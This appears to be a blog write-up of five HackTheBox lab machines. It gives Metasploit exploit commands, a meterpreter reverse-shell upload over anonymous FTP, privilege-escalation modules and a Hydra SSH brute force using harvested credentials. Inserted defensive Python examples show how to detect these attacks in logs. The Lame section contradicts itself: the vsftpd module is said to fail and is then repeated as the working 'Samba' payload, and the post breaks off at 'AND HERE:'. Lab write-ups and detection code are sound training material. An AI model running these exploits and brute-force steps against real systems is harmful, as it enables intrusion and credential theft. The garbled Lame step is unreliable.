My HackTheBox Diary

Simge Karahan
May 16, 2021

Hi everyone, I started solving the HTB labs. I’ll explain the solutions as well as the tools I need. I’m trying to go step by step and learn from scratch. This post contains 5 lab solutions (Lame, Legacy, Devel, Beep and Optimum). Let’s try to collect the flags together :)

First Machine: LAME

First, I start with an nmap scan.

Nmap discovers hosts and services on a network by sending packets and analyzing the responses. Pentesters use it to explore a network and find IP addresses, live machines, open ports, and the services running on them along with their versions.

nmap -T4 -A -v 10.10.10.3
  • -A enables aggressive scanning (OS detection, version detection, script scanning and traceroute)
  • -T4 sets the timing template (4 = aggressive)
  • -v increases the verbosity level

According to the nmap results, vsftpd 2.3.4 is running on port 21.
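A scan like this is also the defender's asset inventory: the same version banners that tell a pentester which module to try tell an administrator which hosts need patching. The following added Python example (my own code, not from the original post) parses nmap's grepable output (the -oG format) and flags services whose banner matches a short watchlist; the vsftpd 2.3.4 entry comes from this section and the HFS 2.3 entry from the Optimum section below. The scan text and the other banners in it are constructed samples, not the real scan from the post.

```python
import re

# Constructed sample of nmap "grepable" output (-oG), modelled on the Lame scan
# described in the post. It is not the real scan output; the banners are made up
# except for vsftpd 2.3.4, which the post itself reports on port 21.
SAMPLE_GNMAP = (
    "# Nmap 7.91 scan initiated as: nmap -T4 -A -v -oG - 10.10.10.3\n"
    "Host: 10.10.10.3 ()\tStatus: Up\n"
    "Host: 10.10.10.3 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, "
    "22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)/, "
    "80/open/tcp//http//Apache httpd 2.2.8 ((Ubuntu) DAV/2)/, "
    "139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X (workgroup: WORKGROUP)/"
    "\tIgnored State: filtered (996)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned\n"
)

# Watchlist of version banners a defender wants to know about. This is a
# constructed, deliberately short list: the vsftpd entry comes from the Lame
# section (the 2.3.4 release with the backdoor), the HFS entry from Optimum.
WATCHLIST = [
    (re.compile(r"^vsftpd 2\.3\.4$"),
     "vsftpd 2.3.4: release shipped with a backdoor; upgrade or remove"),
    (re.compile(r"^HttpFileServer httpd 2\.3\b"),
     "Rejetto HFS 2.3: remote code execution module exists; upgrade or remove"),
]

# One port entry looks like: port/state/proto/owner/service/rpcinfo/version/
# The version field may itself contain "/", so it is captured greedily up to
# the trailing slash.
PORT_RE = re.compile(r"^(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/(.*)/$")


def parse_gnmap(text):
    """Return one dict (host, port, state, proto, service, version) per port
    entry found in the grepable output."""
    results = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        host = line.split()[1]
        for field in line.split("\t"):
            if not field.startswith("Ports:"):
                continue
            # Entries are separated by ", "; a banner containing ", " would
            # need a smarter splitter, so anything that fails to parse is kept
            # as an "unparsed" row instead of being silently dropped.
            for entry in field[len("Ports:"):].strip().split(", "):
                m = PORT_RE.match(entry)
                if not m:
                    results.append({"host": host, "port": None, "state": "unparsed",
                                    "proto": "", "service": "", "version": entry})
                    continue
                port, state, proto, _owner, service, _rpc, version = m.groups()
                results.append({"host": host, "port": int(port), "state": state,
                                "proto": proto, "service": service, "version": version})
    return results


def find_flagged(text, watchlist=WATCHLIST):
    """Match every open port's version banner against the watchlist and return
    (host, port, version, note) tuples for the hits."""
    flagged = []
    for r in parse_gnmap(text):
        if r["state"] != "open":
            continue
        for pattern, note in watchlist:
            if pattern.search(r["version"]):
                flagged.append((r["host"], r["port"], r["version"], note))
    return flagged


if __name__ == "__main__":
    for host, port, version, note in find_flagged(SAMPLE_GNMAP):
        print(f"{host}:{port} {version} -> {note}")
```

Run nmap with -oG to get this format; the script reads the #Fields-free grepable lines only, so the XML output (-oX) would need a different parser. The watchlist is the part to maintain: in practice it is fed from a vulnerability feed rather than typed by hand.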

I checked for a matching module with “search vsftpd”; Metasploit has one for the backdoor in this version.

You can run the search in msfconsole to find the module.

use exploit/unix/ftp/vsftpd_234_backdoor
set rhosts 10.10.10.3
run

But this payload didn't work:

I also saw Samba in the nmap scan:

The payload I used:

use exploit/unix/ftp/vsftpd_234_backdoor
set rhosts 10.10.10.3
run

And it was successful :) Now you can collect the flags.

2-LEGACY

Again, I scanned it with nmap as the first step.

nmap -T4 -A -v 10.10.10.4

I found that SMB is open and the host is running Windows XP.

I took advantage of the MS08-067 vulnerability. You can find it on exploit-db.

use exploit/windows/smb/ms08_067_netapi
set rhosts 10.10.10.4
run

And the session:

We are in. You can navigate to the relevant locations to collect the flags.

3-DEVEL

Again an nmap scan :) --> nmap -T4 -A -v 10.10.10.5

Anonymous FTP login is allowed, and IIS 7.5 is running on HTTP.

If you open “inspect element” by right-clicking the image on the page, you will notice that it is loaded from “/welcome.png”. For this reason I made a test: I created an HTML page, uploaded it using the anonymous FTP login, and the page opened successfully in the browser.

This test was successful. Since the server is IIS, if I upload a file with an .aspx extension and trigger it, I can get a session. The payload creation process for the “aspx” extension:

For the FTP connection:

  • ftp 10.10.10.5
  • Name is “anonymous”
  • Password is empty
  • Once logged in, “put test.aspx”.
  • You can check the file with the “dir” command.

Set the payload for the session: set payload windows/meterpreter/reverse_tcp

To trigger the reverse shell, you must browse to “10.10.10.5/test.aspx”. But this session does not have enough privileges.
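Seen from the server side, the weak point in this box is an anonymous FTP account that can write into the IIS web root, so an uploaded .aspx file runs as soon as someone requests it over HTTP. The following added Python example (my own code, not part of the original post) shows the detection a defender would run over the IIS FTP and web logs: flag anonymous STOR uploads of script extensions, then correlate them with a later HTTP request for the same path. The log lines are constructed samples in W3C extended format; real IIS installs choose their own field sets, so the parser reads the #Fields header instead of assuming fixed columns.

```python
from datetime import datetime

# Extensions IIS will execute, or that should never arrive over anonymous FTP.
SCRIPT_EXTENSIONS = (".aspx", ".asp", ".ashx", ".asmx", ".exe", ".dll")

# Constructed IIS FTP log in W3C extended format. Not a real log from the box;
# IPs, session ids and paths are made up to mirror the upload in the post.
SAMPLE_FTP_LOG = r"""#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip c-port cs-username cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2021-05-16 10:00:01 10.10.14.2 49152 anonymous USER anonymous 331 0 0 a1b2 -
2021-05-16 10:00:02 10.10.14.2 49152 anonymous PASS *** 230 0 0 a1b2 -
2021-05-16 10:00:05 10.10.14.2 49152 anonymous STOR /test.aspx 226 0 0 a1b2 C:\inetpub\wwwroot\test.aspx
2021-05-16 10:00:06 10.10.14.2 49152 anonymous STOR /notes.txt 226 0 0 a1b2 C:\inetpub\wwwroot\notes.txt
"""

# Constructed IIS web log (same W3C format, a different field set).
SAMPLE_WEB_LOG = r"""#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2021-05-16 09:59:00 10.10.10.5 GET /welcome.png - 80 - 10.10.14.2 Mozilla/5.0 200 0 0 15
2021-05-16 10:00:20 10.10.10.5 GET /test.aspx - 80 - 10.10.14.2 Mozilla/5.0 200 0 0 120
"""


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the #Fields names."""
    fields = None
    rows = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split(" ")
        if fields is None or len(values) != len(fields):
            continue  # header-less or malformed line; skip rather than misalign
        rows.append(dict(zip(fields, values)))
    return rows


def _ts(row):
    return datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")


def find_ftp_script_uploads(ftp_log):
    """Anonymous STOR of a script/executable extension is the first half of
    the upload-and-execute pattern."""
    hits = []
    for row in parse_w3c(ftp_log):
        if row.get("cs-method") != "STOR":
            continue
        user = row.get("cs-username", "").lower()
        path = row.get("cs-uri-stem", "")
        if user == "anonymous" and path.lower().endswith(SCRIPT_EXTENSIONS):
            hits.append({"when": _ts(row), "ip": row["c-ip"], "path": path})
    return hits


def correlate_with_web(uploads, web_log):
    """Second half: the uploaded path is requested over HTTP afterwards.
    Assumes the FTP root is the web root (as it is on this box), so the
    FTP and web cs-uri-stem values refer to the same file."""
    web_rows = parse_w3c(web_log)
    alerts = []
    for up in uploads:
        for row in web_rows:
            if (row.get("cs-uri-stem", "").lower() == up["path"].lower()
                    and _ts(row) >= up["when"]):
                alerts.append({**up, "web_ip": row["c-ip"], "requested_at": _ts(row)})
                break
    return alerts


if __name__ == "__main__":
    for alert in correlate_with_web(find_ftp_script_uploads(SAMPLE_FTP_LOG), SAMPLE_WEB_LOG):
        print(f"{alert['ip']} uploaded {alert['path']} at {alert['when']}, "
              f"requested by {alert['web_ip']} at {alert['requested_at']}")
```

The upload alone (first function) is already worth an alert; the correlation mostly serves to prioritise, because an uploaded file that was then fetched has almost certainly been executed. The fix that removes the whole pattern is the obvious one: anonymous FTP write access to the web root should not exist.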

The “sysinfo” command in the Meterpreter session reveals that the target is x86, so you can get suggestions with the local_exploit_suggester module.

When it runs, it lists candidate exploits. I had seen KiTrap0D in a Devel walkthrough, so I tried it.

I used this exploit, and now I'm inside and can collect the flags.

4-BEEP

I tried default credentials like admin, but they didn't work. I looked with searchsploit.

When you view the file with the nano command, you will see a URL. I tried the URL in the browser and it really existed.

I collected passwords from this page, then I changed the URL (I typed “passwd” instead of “amportal.conf”). I also collected usernames from the page that opened (the ones with /bin/bash are valid). Then I saved them for Hydra. Hydra is a password brute-forcing tool that works with wordlists.

When I looked at the nmap scan, I saw that port 22 (OpenSSH) is open, and I tried a brute-force attack with Hydra.

With the correct credentials, I successfully logged in.
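The last two steps (usernames harvested from the leaked passwd file, then Hydra against SSH) leave a very recognisable trace on the target: a burst of failed password attempts from one source, followed by a success. The added Python example below (my own code, not part of the original post) implements that detection over constructed OpenSSH auth.log lines: it counts failures per source IP in a sliding window and records when a flagged IP subsequently authenticates. The host name, user names and IPs in the sample are made up.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime

# Constructed auth.log excerpt: a password-guessing burst from 10.10.14.2 that
# ends in a successful login, one isolated failure, and one normal key login.
SAMPLE_AUTH_LOG = """\
May 16 10:05:01 beep sshd[2301]: Failed password for invalid user admin from 10.10.14.2 port 51000 ssh2
May 16 10:05:02 beep sshd[2302]: Failed password for invalid user admin from 10.10.14.2 port 51001 ssh2
May 16 10:05:03 beep sshd[2303]: Failed password for alice from 10.10.14.2 port 51002 ssh2
May 16 10:05:04 beep sshd[2304]: Failed password for alice from 10.10.14.2 port 51003 ssh2
May 16 10:05:05 beep sshd[2305]: Failed password for alice from 10.10.14.2 port 51004 ssh2
May 16 10:05:06 beep sshd[2306]: Failed password for alice from 10.10.14.2 port 51005 ssh2
May 16 10:05:07 beep sshd[2307]: Accepted password for alice from 10.10.14.2 port 51006 ssh2
May 16 10:05:30 beep sshd[2320]: Failed password for bob from 10.10.14.9 port 40000 ssh2
May 16 10:06:00 beep sshd[2330]: Accepted publickey for bob from 192.168.1.10 port 40010 ssh2
"""

# Matches the OpenSSH "Failed/Accepted <method> for [invalid user] <user> from <ip>" lines.
LINE_RE = re.compile(
    r"^(?P<mon>\w{3})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_auth_log(text):
    """Return login events in file order. Syslog timestamps carry no year, so
    they parse as year 1900; only the differences between them are used."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{m['mon']} {m['day']} {m['time']}", "%b %d %H:%M:%S")
        events.append({"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]})
    return events


def detect_bruteforce(text, threshold=5, window_seconds=60):
    """Flag source IPs with at least `threshold` failed logins inside a sliding
    window of `window_seconds`, and note if a flagged IP later succeeds."""
    window = defaultdict(deque)   # ip -> timestamps of recent failures
    total = Counter()             # ip -> all failures seen so far
    alerts = {}                   # ip -> alert dict
    for ev in parse_auth_log(text):
        ip = ev["ip"]
        if ev["result"] == "Failed":
            total[ip] += 1
            q = window[ip]
            q.append(ev["ts"])
            while (q[-1] - q[0]).total_seconds() > window_seconds:
                q.popleft()   # drop failures that fell out of the window
            if len(q) >= threshold and ip not in alerts:
                alerts[ip] = {"ip": ip, "first_failure": q[0], "failures": 0,
                              "compromised_user": None}
            if ip in alerts:
                alerts[ip]["failures"] = total[ip]
        elif ev["result"] == "Accepted" and ip in alerts and alerts[ip]["compromised_user"] is None:
            # A success after a flagged burst is the "Hydra found the password" signal.
            alerts[ip]["compromised_user"] = ev["user"]
    return sorted(alerts.values(), key=lambda a: a["first_failure"])


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(f"{a['ip']}: {a['failures']} failures since {a['first_failure'].time()}, "
              f"later accepted as {a['compromised_user']}")
```

The threshold and window are the tuning knobs; five failures in a minute from one address is far above what a person mistyping a password produces. An accepted login from an IP that was just flagged is the event to page on, because at that point the guessed password is in use.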

5-OPTIMUM

nmap -T4 -sS -A -v 10.10.10.8

In the nmap results, I saw HttpFileServer httpd 2.3 on a TCP port. I searched for the relevant exploit and found it at https://www.rapid7.com/db/modules/exploit/windows/http/rejetto_hfs_exec/

The payload → exploit/windows/http/rejetto_hfs_exec (you must also set the srvhost value to your own IP address). A session is created when you set the options and run. You can find a flag in “user.txt.txt”, but we don’t have access to the other one (ACCESS DENIED).

You can use the “ps” command to list processes. Using migrate, you can move to another process on the victim: migrate <pid>

I checked with local_exploit_suggester.

The payload: ms16_032_secondary_logon_handle_privesc

AND HERE:
